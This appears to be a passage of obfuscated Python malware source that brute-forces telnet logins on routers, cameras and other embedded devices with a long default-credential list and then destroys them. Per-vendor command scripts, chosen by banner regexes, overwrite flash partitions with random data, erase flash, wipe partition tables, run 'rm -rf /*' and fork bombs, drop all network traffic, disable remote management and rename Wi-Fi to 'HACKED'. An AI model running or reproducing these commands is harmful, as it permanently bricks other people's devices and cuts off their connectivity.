'netgear/D-Link' ,
'www-data/123456' ,
'admin/999' ,
'hector/hector' ,
'admin/login' ,
'root/88' ,
'openerp/openerp' ,
'cpanel/0fc0f17d6087680e' ,
'/1' ,
'root/4444444' ,
'thomas/thomas123' ,
'/hewlpack' ,
'admin/iyeh' ,
'admin/66666' ,
'admin/3333' ,
'user/live' ,
'maria/maria' ,
'admin/juklop' ,
'root/cat' ,
'root/6y5t4r3e2w1q' ,
'admin/passw0rd' ,
'ftpuser/ftppass' ,
'WEBADM/password' ,
'root/222222' ,
'root/PWLA-root' ,
'admin/airocon' ,
'admin/gfhjkm' ,
'cmsftp/cmsftp' ,
'cisco/admin' ,
'/XCA2Y12U71' ,
'mike/mike123' ,
'root/uClinux' ,
'root/seiko2005' ,
'/netadmin' ,
'bill/bill' ,
'root/d' ,
'admin/55' ,
'root/v' ,
'root/LZEDADM' ,
'root/welc0me' ,
'root/sh' ,
'ashish/ashish' ,
'root/555555555' ,
'root/raspberry' ,
'admin/33' ,
'netgear/12345' ,
'joe/joe' ,
'root/syste' ,
'admin/comcast' ,
'sysadmin/superuser' ,
'walter/walter' ,
'guest/abc123' ,
'test/12345' ,
'root/operator' ,
'cisco/123456' ,
'test/test1234' ,
'admin/VTech' ,
'admin/enable' ,
'web/web123' ,
'/ascend' ,
'root/12190091' ,
'admin/a' ,
'lms/lms' ,
'sandeep/sandeep123' ,
'admin/7777' ,
'super/zxcvbnm,.' ,
'cubrid/cubrid' ,
'portal/portal' ,
'user/user123' ,
'ftptest/ftptest' ,
'support/cat' ,
'user/default' ,
'root/4444' ,
'user/test' ,
'admin/adminadmin' ,
'root/t1789' ,
'test/tester' ,
'www-data/www-data' ,
'root/rasplex' ,
'root/<>' ,
'admin/ubnt' ,
'admin/6666666666' ,
'1234/enable' ,
'netbrain/$ilv3r*2017' ,
'default/enable' ,
'verwalter/verwalter' ,
'login/1234' ,
'admin/e2b81d_1' ,
'vivek/vivek' ,
'admin/Kendalf9' ,
'root/999999' ,
'root/6666666' ,
'admin/mts' ,
'jim/jim123' ,
'jenkins/jenkins123' ,
'netgear/telnet' ,
'test/123123' ,
'admin/qweasdOP' ,
'mts/mts' ,
'login/support' ,
'admin/radmin' ,
'teste/teste' ,
'cisco/comcast' ,
'root/team2' ,
'debug/debug' ,
'moodle/moodle123' ,
'root/G' ,
'xbmc/xbmc' ,
'deployer/deployer' ,
'rptic/raspberry' ,
'500/500' ,
'koha/koha123' ,
'admin/inet' ,
'jose/jose' ,
'admin/online' ,
'TKD/o0mb6mff' ,
'root/0000000' ,
'netman/n' ,
'php5/a82f8443132f0fda' ,
'root/xbmc' ,
'support/test' ,
'cloud/cloud' ,
'root/openelec' ,
'admin/590152' ,
'odoo/odoo' ,
'login/login' ,
'admin/11' ,
'sybase/sybase' ,
'biz/biz123' ,
'guest/manager' ,
'root/r' ,
'root/Admin123' ,
'ingres/ingres' ,
'ubnt/1234' ,
'admin1/enable' ,
'admin/nimda' ,
'jboss/jboss' ,
'proftpd/proftpd' ,
'finance/finance' ,
'666666/enable' ,
'lucas/lucas' ,
'library/library' ,
'root/dup' ,
'support/support123' ,
'ncuser/ncuser' ,
'root/server' ,
'guest/cisco' ,
'train/train' ,
'admin/dPZb4GJTu9' ,
'admin/66' ,
'admin/Ferum' ,
'root/pfsense' ,
'jack/jack' ,
'cisco/login' ,
'root/waldo' ,
'manager/-!.!\'%2' ,
'/3ascotel' ,
'deployer/deploy' ,
'admin/666' ,
'test/1234' ,
'admin/sh' ,
'toto/toto' ,
'mysql/123456' ,
'newadmin/newadmin' ,
'ftp/123456' ,
'screen/screen' ,
'cisco/toor' ,
'root/444444' ,
'temp/temp' ,
'root/tl789' ,
'root/111' ,
'Administrator/enable' ,
'openfiler/password' ,
'root/1q2w3e4r' ,
'git/git123' ,
'cpanel/cae0dd132d2d89f5' ,
'mobile/alpine' ,
'root/anni2013' ,
'support/1qaz2wsx' ,
'admin/manager' ,
'admin/44' ,
'admin/enable36291' ,
'ftpuser/123456' ,
'mgts/mtsoao' ,
'userftp/userftp' ,
'user/dreambox' ,
'user/enable' ,
'host/dnnhost' ,
'admin/qazxsw' ,
'TKD/5un2na0o' ,
'admin/rombik1' ,
'openvpn/openvpn' ,
'guest/1234' ,
'git/test1234' ,
'admin/adn8pzszk' ,
'default/4U' ,
'superuser/asante' ,
'icinga/icinga' ,
'sshd/sshd' ,
'enable/show' ,
]
if 90 - 90: IIiIIiIii1I
if 9 - 9: O0oo0OOOOO00 % Oooo - oOoO0Ooo % O0oo0OOOOO00
O0O = "SPLTX"
if 81 - 81: Ii11i1iIi / Ii11i1iIi * Oo0 / o0oooooO / IIiIii1iI
iII11I = [ 'TELCO' , 'inet' , 'zyxel' , 'ZYX' , 'zyx' , 'huawei' , 'LZE' , 'lze' , 'qualcomm' , 'dlink' , 'broadcom' , 'router' , 'DLink' , 'main' , 'wan' , 'global' , 'cpa' , 'customer' , 'linux' , 'default' , 'cisco' ]
o00 = [ '%s' % ( random . randint ( 100 , 999 ) ) , '%s' % ( random . randint ( 10 , 99 ) ) , '%s' % ( random . choice ( '%#!@_=;' ) ) , '%s' % ( random . choice ( 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' ) ) ]
o00OooOO0oooo = [ 'admin' , 'ADMIN' , 'support' , 'mgmt' , 'manager' , 'adm' , 'ADM' , 'root' , 'account' , 'cs' , 'corporate' , 'business' , 'fiber' , 'adsl' , 'vdsl' , 'wifi' , 'administrator' , 'Administrator' , 'default' , 'factory' ]
OoO0 = 'root/' + random . choice ( iII11I ) + random . choice ( o00 ) + random . choice ( o00OooOO0oooo )
if 91 - 91: oOOoO00oo0 / Ii11i1iIi
oOoOOoooo0 = "w\nuname -a\nls -alF /etc/\ncat /etc/passwd\ncat /etc/shadow\ncat /proc/version\n" ;
if 55 - 55: OOOoOooO / oOOo0000o + oOoO0Ooo
ooO0o = [
[ "broadcom" , ".*" , "(telnetd.*error.*processInput.*unrec.*|BCM96|ls -alF /etc/: not found)" ,
'lan config --ipaddr primary 10.1.2.3 255.255.255.248' , '' ,
'wlan config --ssid "HACKED: DEFAULT PASSWORD"' , '' ,
'wlan config --enable 0' , '' ,
'wlan config --ssid primary "HACKED: DEFAULT PASSWORD"' , '' ,
'wlan config --status primary disable' , '' ,
'save' , '' ,
'tr69cfg --inform disable' , '' ,
'tr69cfg --connreq disable' , '' ,
'tr69cfg --password HACKED' , '' ,
'tr69cfg --intf HACKED' , '' ,
'tr69cfg --info' , '' ,
'tr69c ConnReqPort 31351' , '' ,
'save' , '' ,
'tftp -p -t f -f `cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default` 127.0.0.1' , '' ,
'tftp -p -t c -f `cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default` 127.0.0.1' , '' ,
'nslookup $(sh)' , '' ,
'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default' , '' ,
'kill `sh`' , '' ,
'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default' , '' ,
'tftp -p -f test ;flash_erase /dev/mtdblock0 0 999999 0;flash_erase /dev/mtdblock1 0 999999 0;flash_erase /dev/mtdblock2 0 999999 0;flash_erase /dev/mtdblock3 0 999999 0' , '' ,
'tftp -p -f test ;cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root' , '' ,
'tftp -p -f test ;route del default' , '' ,
'ifconfig $(sh)' , '' ,
'cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3;cat /dev/urandom >/dev/root;route del default' , '' ,
'cat | sh' , '' ,
'sh' , '[#>]' ,
'flash_erase /dev/mtdblock0 0 999999 0' , '[$>#]' ,
'flash_erase /dev/mtdblock1 0 999999 0' , '[$>#]' ,
'flash_erase /dev/mtdblock2 0 999999 0' , '[$>#]' ,
'flash_erase /dev/mtdblock3 0 999999 0' , '[$>#]' ,
'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
'cat /dev/urandom >/dev/mtd0 &' , '' ,
'cat /dev/urandom >/dev/mtd1 &' , '' ,
'cat /dev/urandom >/dev/mtd2 &' , '' ,
'cat /dev/urandom >/dev/mtd3 &' , '' ,
'route del default;iptables -F;iptables -A INPUT -j DROP' , '%WAIT%' ,
'poweroff -n -f' , '[#>]' ,
'poweroff' , '[#>]' ,
'd(){ d|d & };d 2>/dev/null' , '' ,
'ping ;busybox cat /dev/urandom >/dev/root;route del default;iptables -F;iptables -A INPUT -j DROP' , '' ,
'traceroute ;busybox cat /dev/urandom >/dev/root;route del default;iptables -F;iptables -A INPUT -j DROP' , '' ,
'loaddefaultconfig' , '[#>]' ,
'adsl connection --loopback' , '' ,
'xdslctl connection --loopback' , '' ,
'ppp config ppp0 down' , '' ,
'ppp config ppp0.1 down' , '' ,
'ppp config ppp0.2 down' , '' ,
'ppp config ppp1 down' , '' ,
'ppp config ppp1.1 down' , '' ,
'ppp config ppp2.1 down' , '' ,
'ppp config ppp3.3 down' , '' ,
'ppp config pppo3G0 down' , '' ,
'save' , '' ,
'defaultgateway config ppp0' , '' ,
'defaultgateway config ppp1.1' , '' ,
'defaultgateway config ppp2.1' , '' ,
'save' , '' ,
'dhcpserver config 192.168.99.1 192.168.99.1 1' , '' ,
'lan config --ipaddr secondary 10.1.2.4 255.255.255.255' , '' ,
'save' , '' ,
'wan delete service ppp0' , '[#>]' ,
'wan delete service ppp0.1' , '[#>]' ,
'wan delete service ppp1.1' , '[#>]' ,
'wan delete service pppoa1' , '[#>]' ,
'wan delete service pppoa0' , '[#>]' ,
'wan delete service ppp0.2' , '[#>]' ,
'wan delete service ppp1.2' , '[#>]' ,
'wan delete service ppp2.1' , '[#>]' ,
'wan delete service eth4.1' , '[#>]' ,
'wan delete service eth4.2' , '[#>]' ,
'wan delete service ipoe_eth0_4' , '[#>]' ,
'wan delete service ipoe_eth0_3' , '[#>]' ,
'wan delete service ipoe_eth0_2' , '[#>]' ,
'wan delete service ipoe_eth0_1' , '[#>]' ,
'restoredefault' , '' ,
'exit' , '' ,
'loaddefaultconfig' , '[#>]' ,
'adsl connection --loopback' , '' ,
'xdslctl connection --loopback' , '' ,
'ppp config ppp0 down' , '' ,
'ppp config ppp0.1 down' , '' ,
'ppp config ppp0.2 down' , '' ,
'ppp config ppp1 down' , '' ,
'ppp config ppp1.1 down' , '' ,
'ppp config ppp2.1 down' , '' ,
'ppp config ppp3.3 down' , '' ,
'ppp config pppo3G0 down' , '' ,
'save' , '' ,
'defaultgateway config ppp0' , '' ,
'defaultgateway config ppp1.1' , '' ,
'defaultgateway config ppp2.1' , '' ,
'save' , '' ,
'wan delete service ppp0' , '[#>]' ,
'wan delete service ppp0.1' , '[#>]' ,
'wan delete service ppp1.1' , '[#>]' ,
'wan delete service pppoa1' , '[#>]' ,
'wan delete service pppoa0' , '[#>]' ,
'wan delete service ppp0.2' , '[#>]' ,
'wan delete service ppp1.2' , '[#>]' ,
'wan delete service ppp2.1' , '[#>]' ,
'wan delete service eth4.1' , '[#>]' ,
'wan delete service eth4.2' , '[#>]' ,
'wan delete service ipoe_eth0_4' , '[#>]' ,
'wan delete service ipoe_eth0_3' , '[#>]' ,
'wan delete service ipoe_eth0_2' , '[#>]' ,
'wan delete service ipoe_eth0_1' , '[#>]' ,
'restoredefault' , '' ,
'reboot' , ''
] ,
[ "broadcom" , ".*" , 'support:\S+:0:0:Technical Support:.:.bin.sh' ,
'lan config --ipaddr primary 10.1.2.3 255.255.255.255' , '' ,
'lan config --ipaddr secondary 10.1.2.4 255.255.255.255' , '' ,
'wlan config --ssid "HACKED: DEFAULT PASSWORD"' , '' ,
'wlan config --enable 0' , '' ,
'wlan config --ssid primary "HACKED: DEFAULT PASSWORD"' , '' ,
'wlan config --status primary disable' , '' ,
'save' , '' ,
'tr69cfg --inform disable' , '' ,
'tr69cfg --connreq disable' , '' ,
'tr69cfg --password HACKED' , '' ,
'tr69cfg --intf HACKED' , '' ,
'tr69cfg --info' , '' ,
'tr69c ConnReqPort 31351' , '' ,
'save' , '' ,
'sh' , '[$>#] ' ,
'flash_erase /dev/mtdblock0 0 999999 0' , '[$>#] ' ,
'flash_erase /dev/mtdblock1 0 999999 0' , '[$>#] ' ,
'flash_erase /dev/mtdblock2 0 999999 0' , '[$>#] ' ,
'flash_erase /dev/mtdblock3 0 999999 0' , '[$>#] ' ,
'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
'cat /dev/urandom >/dev/mtd0 &' , '' ,
'cat /dev/urandom >/dev/mtd1 &' , '' ,
'cat /dev/urandom >/dev/mtd2 &' , '' ,
'cat /dev/urandom >/dev/mtd3 &' , '' ,
'route del default;iptables -t nat -F;iptables -F;iptables -A INPUT -j DROP' , '%WAIT%' ,
"restoredefault" , '[$>#] ' ,
'reboot' , '%TERM%'
] ,
[ "broadcom" , ".*" , 'Linux.*\(\S+txcpyjeb\S*\)' ,
'sh' , '[$>#] ' ,
'flash_erase /dev/mtdblock0 0 999999 0' , '[$>#] ' ,
'flash_erase /dev/mtdblock1 0 999999 0' , '[$>#] ' ,
'flash_erase /dev/mtdblock2 0 999999 0' , '[$>#] ' ,
'flash_erase /dev/mtdblock3 0 999999 0' , '[$>#] ' ,
'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
'cat /dev/urandom >/dev/mtd0 &' , '' ,
'cat /dev/urandom >/dev/mtd1 &' , '' ,
'cat /dev/urandom >/dev/mtd2 &' , '' ,
'cat /dev/urandom >/dev/mtd3 &' , '' ,
'route del default;iptables -t nat -F;iptables -F;iptables -A INPUT -j DROP' , '%WAIT%' ,
"restoredefault" , '[$>#] ' ,
'reboot' , '%TERM%'
] ,
[ 'broadcom' , '.*' , 'from HyperTerminal you would need to use' ,
'cat /dev/urandom >/dev/mtdblock0 &' , 'to continue' ,
'' , '' ,
'cat /dev/urandom >/dev/mtdblock1 &' , 'to continue' ,
'' , '' ,
'cat /dev/urandom >/dev/mtdblock2 &' , 'to continue' ,
'' , '' ,
'cat /dev/urandom >/dev/mtdblock3 &' , 'to continue' ,
'' , '' ,
'iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP' , 'to continue' ,
'' , '' ,
'12' , '==>' ,
'1' , 'Please wait' ,
] ,
[ 'broadcom' , 'supervisor/zyad1234' , '' ,
'dhcpserver config 192.168.99.1 192.168.99.1 1' , '' ,
'lan config --ipaddr primary 10.1.2.3 255.255.255.255' , '' ,
'lan config --ipaddr secondary 10.1.2.4 255.255.255.255' , '' ,
'wlan config --ssid "HACKED: DEFAULT PASSWORD"' , '' ,
'wlan config --enable 0' , '' ,
'save' , '' ,
'tr69cfg --inform disable' , '' ,
'tr69cfg --connreq disable' , '' ,
'tr69cfg --password HACKED' , '' ,
'tr69cfg --intf HACKED' , '' ,
'tr69cfg --info' , '' ,
'save' , '' ,
'tftp -p -f test ;flash_erase /dev/mtdblock0 0 999999 0;flash_erase /dev/mtdblock1 0 999999 0;flash_erase /dev/mtdblock2 0 999999 0;flash_erase /dev/mtdblock3 0 999999 0' , '' ,
'tftp -p -f test ;cat /dev/urandom >/dev/mtdblock0;cat /dev/urandom >/dev/mtdblock1;cat /dev/urandom >/dev/mtdblock2;cat /dev/urandom >/dev/mtdblock3' , '' ,
'tftp -p -f test ;route del default' , '' ,
"adsl connection --loopback\nxdslctl connection --loopback\nppp config ppp0 down\nppp config ppp1.1 down\nppp config ppp2.1 down\nppp config ppp3.3 down\nppp config pppo3G0 down\nsave" , '' ,
'defaultgateway config ppp0' , '' ,
'defaultgateway config ppp1.1' , '' ,
'defaultgateway config ppp2.1' , '' ,
'sh' , '[#>]' ,
'flash_erase /dev/mtdblock0 0 999999 0' , '[$>#]' ,
'flash_erase /dev/mtdblock1 0 999999 0' , '[$>#]' ,
'flash_erase /dev/mtdblock2 0 999999 0' , '[$>#]' ,
'flash_erase /dev/mtdblock3 0 999999 0' , '[$>#]' ,
'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
'cat /dev/urandom >/dev/mtd0 &' , '' ,
'cat /dev/urandom >/dev/mtd1 &' , '' ,
'cat /dev/urandom >/dev/mtd2 &' , '' ,
'cat /dev/urandom >/dev/mtd3 &' , '' ,
'route del default;iptables -F;iptables -A INPUT -j DROP' , '' ,
'poweroff -n -f' , '[#>]' ,
'poweroff' , '[#>]' ,
'restoredefault' , '' ,
'exit' , '' ,
'restoredefault' , '%TERM%'
] ,
[ 'xiongctrl' , 'admin/.*' , 'PORT:9527:' ,
'shell\nbusybox cat /dev/urandom >/dev/mtd0 &\nbusybox cat /dev/urandom >/dev/mtd1 &\nbusybox cat /dev/urandom >/dev/mtd2 &\nbusybox cat /dev/urandom >/dev/mtd3 &\nbusybox cat /dev/urandom >/dev/mtd4 &\nbusybox cat /dev/urandom >/dev/mtd5 &\nbusybox cat /dev/urandom >/dev/mtdblock0 &\nbusybox cat /dev/urandom >/dev/mtdblock1 &\nbusybox cat /dev/urandom >/dev/mtdblock2 &\nbusybox cat /dev/urandom >/dev/mtdblock3 &\nbusybox cat /dev/urandom >/dev/mtdblock4 &\nbusybox cat /dev/urandom >/dev/mtdblock5 &\nroute del default' , '[$] ' ,
'netitf -ip\nnetitf -dhcp\nnetitf -dhcp 0\nnetitf -dns 1.2.3.4 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' ,
'netitf -ip 1.2.3.4 255.255.255.0 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' ,
'exit' , '[$] ' ,
'netitf -ip\nnetitf -dhcp\nnetitf -dhcp 0\nnetitf -dns 1.2.3.4 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' ,
'netitf -ip 1.2.3.4 255.255.255.0 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' ,
';;' , '[$] ' ,
'netitf -ip\nnetitf -dhcp\nnetitf -dhcp 0\nnetitf -dns 1.2.3.4 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' ,
'netitf -ip 1.2.3.4 255.255.255.0 1.2.3.5\ncfg -s /mnt/mtd/Config/Json\ncfg -s /mnt/custom/CustomConfig' , '[$] ' ,
] ,
[ 'baby' , '.*' , '(www\.netween\.co\.kr|rjhm91lt37eEtYB0Czii1)' ,
'cat /dev/urandom >/dev/mtdblock0 &' , '[$>#] ' ,
'cat /dev/urandom >/dev/mtdblock1 &' , '[$>#] ' ,
'cat /dev/urandom >/dev/root &' , '%WAIT%' ,
'cd /web/' , '[$>#] ' ,
'grep "reboot" *' , '[$>#] ' ,
] ,
[ 'vertex' , 'root/vertex25ektks123' , '' ,
'configure terminal' , '[$>#] ' ,
'restore factory-defaults' , '[$>#] ' ,
'exit' , '[$>#] ' ,
'quote sh' , '[$>#] ' ,
'cat /dev/urandom >/dev/root &' , '[$>#] ' ,
'cat /dev/urandom >/dev/ram &' , '[$>#] ' ,
'route del default' , '%WAIT%' ,
'reboot' ,
] ,
[ 'honeypot' , OoO0 , '' ,
'cat /etc/passwd' , '' ,
'cat /etc/shadow' , '' ,
'uname -a' , '' ,
] ,
[ 'honeypot' , '.*' , '(fw-mgmt0|Ubuntu|el\d\.x86_?64|Debian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent|Linux\s\S+S\d\s.*x86_?64|Linux\s.*amd64.*SMP.*Debian.*x86_?64)' ,
'echo SYSTEM HACKED PLEASE REINSTALL >/etc/motd' , '' ,
'echo SYSTEM HACKED PLEASE REINSTALL >/etc/version' , '' ,
'echo SYSTEM-HACKED-PLEASE-REINSTALL >/etc/hostname' , '' ,
'wall \x1b]2;HACKED\x07' , '' ,
] ,
[ "sagemcom" , ".*" , 'HomeGateway.*\s*.*Bad\scommand.*Try\susing\shelp' ,
"conf print /admin/" , "HomeGateway> " ,
"conf set /admin/rmt_mng/ports/2/enabled 0" , "HomeGateway> " ,
"conf set /admin/rmt_mng/ports/1/enabled 0" , "HomeGateway> " ,
"conf set /admin/rmt_mng/ports/0/enabled 0" , "HomeGateway> " ,
"conf set /admin/user/2/password x" , "HomeGateway> " ,
"conf set /admin/user/1/password x" , "HomeGateway> " ,
"conf set /admin/user/0/password x" , "HomeGateway> " ,
"conf reconf 1" , "HomeGateway> " ,
"flash commit" , "HomeGateway> " ,
"system reboot" , '%TERM%' ,
] ,
[ "sagemcom" , ".*" , 'OpenRG>' ,
"conf print /admin/" , "OpenRG> " ,
"conf set /admin/rmt_mng/ports/2/enabled 0" , "OpenRG> " ,
"conf set /admin/rmt_mng/ports/1/enabled 0" , "OpenRG> " ,
"conf set /admin/rmt_mng/ports/0/enabled 0" , "OpenRG> " ,
"conf set /admin/user/2/password x" , "OpenRG> " ,
"conf set /admin/user/1/password x" , "OpenRG> " ,
"conf set /admin/user/0/password x" , "OpenRG> " ,
"conf reconf 1" , "OpenRG> " ,
"flash commit" , "OpenRG> " ,
"system reboot" , '%TERM%' ,
] ,
[ "nomadix" , '.*' , 'Display advanced system configuration menu' ,
'system' , '\S>' ,
'factory' , 'yes/no' ,
'yes' , 'CR' ,
'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n' , 'CR' ,
'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n' , 'CR' ,
'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n' , 'CR' ,
] ,
[ 'sse' , '.*' , 'step into administration terminal' ,
'' , '~ ' ,
'd() { d|d & }; d' , '~ ' ,
] ,
[ 'cisco' , '.*' , 'User Access Verification' ,
'enable' , '\S+[#>]' ,
'erase /all nvram:' , 'confirm' ,
'y' , '\S+[#>]' ,
'erase startup-config' , 'confirm' ,
'y' , '\S+[#>]' ,
'reload' , 'yes/no' ,
'y' , 'confirm' ,
'y' , '' ,
'power rps port 6 mode standby' , '\S+[#>]' ,
'power rps port 5 mode standby' , '\S+[#>]' ,
'power rps port 4 mode standby' , '\S+[#>]' ,
'power rps port 3 mode standby' , '\S+[#>]' ,
'power rps port 2 mode standby' , '\S+[#>]' ,
'power rps port 1 mode standby' , '\S+[#>]' ,
] ,
[ 'kylink' , '.*' , 'Kylink SIP' ,
'8' , 'y/n' ,
'y' , '\):' ,
'9' , 'y/n' ,
'y' , '\):' ,
'1' , '\):' ,
'1' , '\):' ,
'1.2.3.4' , '\):' ,
'3' , '\):' ,
'1.2.3.5' , '\):' ,
'q' , '\):' ,
'9' , 'y/n' ,
'y' , '\):' ,
'b' , 'y/n' ,
'y' , 'seconds' ,
] ,
[ "dahuaold" , "root/vizxv" , '' ,
'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'busybox cat /dev/urandom >/dev/sda &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock10 &' , '' ,
'busybox cat /dev/urandom >/dev/mmc0 &' , '' ,
'busybox cat /dev/urandom >/dev/sdb &' , '' ,
'busybox cat /dev/urandom >/dev/ram0 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd0 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd1 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' ,
"fdisk -C 1 -H 1 -S 1 /dev/mtd0" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 -H 1 -S 1 /dev/mtd1" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 -H 1 -S 1 /dev/sda" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 -H 1 -S 1 /dev/mtdblock0" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
'route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &' , '%WAIT%' ,
'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT%' ,
"halt -n -f" , '[#$] ' ,
"reboot" , '[#$] ' ,
] ,
[ "hilinux" , ".*" , 'Welcome to HiLinux' ,
'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'busybox cat /dev/urandom >/dev/sda &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock10 &' , '' ,
'busybox cat /dev/urandom >/dev/mmc0 &' , '' ,
'busybox cat /dev/urandom >/dev/sdb &' , '' ,
'busybox cat /dev/urandom >/dev/ram0 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd0 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd1 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' ,
"fdisk -C 1 -H 1 -S 1 /dev/mtd0" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 -H 1 -S 1 /dev/mtd1" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 -H 1 -S 1 /dev/sda" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 -H 1 -S 1 /dev/mtdblock0" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
'route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &' , '%WAIT%' ,
'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT%' ,
"halt -n -f" , '[#$] ' ,
"reboot" , '[#$] ' ,
] ,
[ "zlx" , "root/zlxx\." , "" ,
'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd0 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd1 &' , '' ,
'busybox cat /dev/urandom >/dev/sda &' , '' ,
'busybox cat /dev/urandom >/dev/ram0 &' , '' ,
'flash_unlock /dev/mtd0' , '' ,
'flash_eraseall /dev/mtd0 &' , '' ,
'flash_unlock /dev/mtd1' , '' ,
'flash_eraseall /dev/mtd1 &' , '' ,
'flash_unlock /dev/sda' , '' ,
'flash_eraseall /dev/sda &' , '' ,
'flash_unlock /dev/mtdblock0' , '' ,
'flash_eraseall /dev/mtdblock0 &' , '' ,
"fdisk -C 1 -H 1 -S 1 /dev/sda" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 -H 1 -S 1 /dev/mtd0" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 -H 1 -S 1 /dev/mtd1" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 -H 1 -S 1 /dev/mtdblock0" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
'd(){ d|d & };d 2>/dev/null' , '[#$>] ' ,
